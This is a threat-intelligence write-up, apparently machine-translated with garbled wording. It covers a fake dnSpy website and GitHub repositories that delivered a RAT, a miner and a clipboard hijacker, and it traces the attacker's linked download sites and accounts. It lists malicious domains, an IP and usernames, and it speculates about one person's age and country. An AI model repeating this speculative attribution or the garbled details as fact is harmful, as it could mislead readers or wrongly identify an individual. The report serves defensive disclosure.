Fake dnSpy - Poisoned in this chicken soup

"dnSpy" is a popular one for debugging, modifying and decompiling. Tools for .NET programs. Cybersecurity researchers in analysis. Often used when net programs or malware.

On January 8, 2022, BLEEPING COMPUTER posted that an attacker used malicious dnSpy to launch an attack against cybersecurity researchers and developers.

@MalwareHunterTeam tweet revealing the address of Github's repository that distributes a maliciously compiled version of dnSpy that will subsequently install a clipboard hijacker, Quasar RAT, mining Trojan, etc.

Check out the official version of Git for dnSpy and find that the tool is in Archived, has stopped updating in 2020, and has no official site.

The attackers took advantage of this by registering dnspy[.] net domain name, designed a very beautiful website to distribute malicious dnSpy programs.

Buying Google Search Ads at the same time puts the site at the top of search engine results to deepen the reach.

As of January 9, 2022, the site was offline.

Sample analysis

dnspy[.] Net is a modified version of dnSpy 6.1.8, which is also the last version officially released.

The attacker completes the infection by modifying the dnSpy .dll entry code of one of the dnSpy core modules.

The normal entry function .dll dnSpy is as follows:

The modified entry adds a memory-loaded executable:

The program is named dnSpy Reader:

and after confusion:

Subsequently, some mining, shearboard hijackers, RAT, etc. will be issued through mshta:

The two githubs created by the attackers are:

https[:]//github[.] with/carbonblackz/dnSpy;

https[:]//github[.] with/isharpdev/dnSpy;

The usernames used are: isharpdev and carbonblackz. Remember the name, we'll see it later.

Asset line extension

By dnspy[.] From the analysis of net, we found some interesting traces that could be used to expand the assets of the attackers:

dnspy.net：

Domain name dnspy[.] Net registration is on April 14, 2021.

There are multiple resolution records for the domain name, most of which are cdn services provided by Cloudflare, but when we look at the specific historical resolution records, we find that from December 13 to January 03, the DOMAIN name used AN IP of 45.32.253 [.] 0, unlike several other IPs of the Cloudflare CDN service, this IP has only a small number of mapping records:

Querying the PDNS records of the IP, it can be found that most of the domain names mapped by the IP are suspected to be forged domain names, and most of the domain names have been offline.

These domain names are partly download sites such as hacking tools/office software, and are suspected to be fake domain names of some normal websites.

As well as the domain names dnspy.net disclosed in the incident, based on this behavior pattern, we suspect that these domain names are the assets of the attackers, so we further analyzed these domain names.

Take the database[.] Co, for example, the domain name history is a hacking tool download site, and the hacker tool on the home page of the website unzips the password as "CarbonBlackz", which is the same name as one of the Github users who uploaded malicious dnspy.

The site's subsequent update page is titled Combolist-Cloud, with 45.32.253[.] 0 The combolist.cloud domain name records that exist in the resolution record are the same, and some files are distributed using mediafire or gofile.

The domain name is suspected to be a combolist[.] top fake site, combolist[.] top is a forum that provides leaked data.

torfiles[.] net is also a software download station.

Windows-software[.] co and windows-softeware[.] net is a download station created by the same set of templates.

shortbase[.] net owns the same dnspy[.] net is the same as the CyberPanel installation page, and the date is December 19, 2021.

The following figure is dnspy[.] Net The historical installation page of CyberPanel in the WaybackMachine record.

coolmint[.] net is also a download site and is still accessible as of January 12, 2022, but the download link is only a redirect to mega[.] nz：

filesr[.] net and toolbase[.] co for the same set of templates:

The About us for this site has not been modified:

The content of this page is from FileCR[.] The about us page of com has been modified from:

filesr[.] net's software is distributed using dropbox, but the current links are invalid.

Finally, zippyfiles[.] net, the site is a hack tool download station:

We also found a user named tuki1986 on reddit who had been promoting toolbase two months ago[.] co and zippyfiles[.] net site.

The site that the user promoted a year ago was bigwarez[.] net：

Looking at the site's history reveals that it is also a tool download site with multiple social media accounts associated with it:

Twitter @Bigwarez2:

[email protected]：

The account now promotes websites as itools[.] digital, is a browser plug-in download station.

Facebook group @free.software.bigwarez:

LinkedIn - Currently inaccessible: @free-software-1055261b9.

tumblr@bigwarez。

Continuing to analyze the records of tuki1986, another website blackos was discovered[.] net：

The site is also a hacking tool download site:

And the threat intelligence platform is marked with backdoor software:

Through the site, a user named Sadoutlook1992 was found to have been publishing hacking tools in various hacking forums since 18 years.

At its latest event, download the link for zippyfiles[.] net：

From the malicious Github repository and the unzipped password, it is known that there is a username called "CarbonBlackz", which is retrieved by a search engine and found that the data breach site Raidforums[.] Com has a user named "Carbonblackz".

Similarly, accounts are registered in the Russian-language Black and Gray Forum, neither of which has posted any posts or replies and is suspected to have not been put into use.

It also published software download links in Vietnam's largest forum:

By looking at the WHOIS information for these domains, it was found that filesr[.] The contact email address for net is [email protected]:

The information querying the mailbox was linked to a 35-year-old person suspected to be from Russia.

Judging from the two IDs of carbon 1986 and tuki 1986, 1986 is suspected to be its birth year, which also meets the age of 35.

Based on the relevance, behavior patterns and similar promotion methods of these domains, we believe that these domains are related to dnspy[.] Net's attackers belong to the same group of people.

This is a well-built malicious organization that has been operating since at least October 2018, by registering a large number of websites, providing hacking tools/cracking software downloads, and promoting it on multiple social media, thus infecting hackers, security researchers, software developers, etc., with malicious behavior such as mining, stealing cryptocurrencies or stealing data through RAT software.

conclusion

Cracking software is not uncommon, but it is easier for security researchers to attack, because some hacking tools, analysis tools' sensitive behavior is more likely to be killed by soft avira, so some security researchers may turn off antivirus software to avoid annoying warnings.

While most of the malicious websites, Github repositories, and links used to distribute malware are now obsolete, security researchers and developers remain vigilant.

For various cracked/leaked hacking tools, it is recommended to run in a virtual environment, develop software, office software to download from the official website or formal channels, and it is recommended to use the genuine version to avoid unnecessary losses.

- END -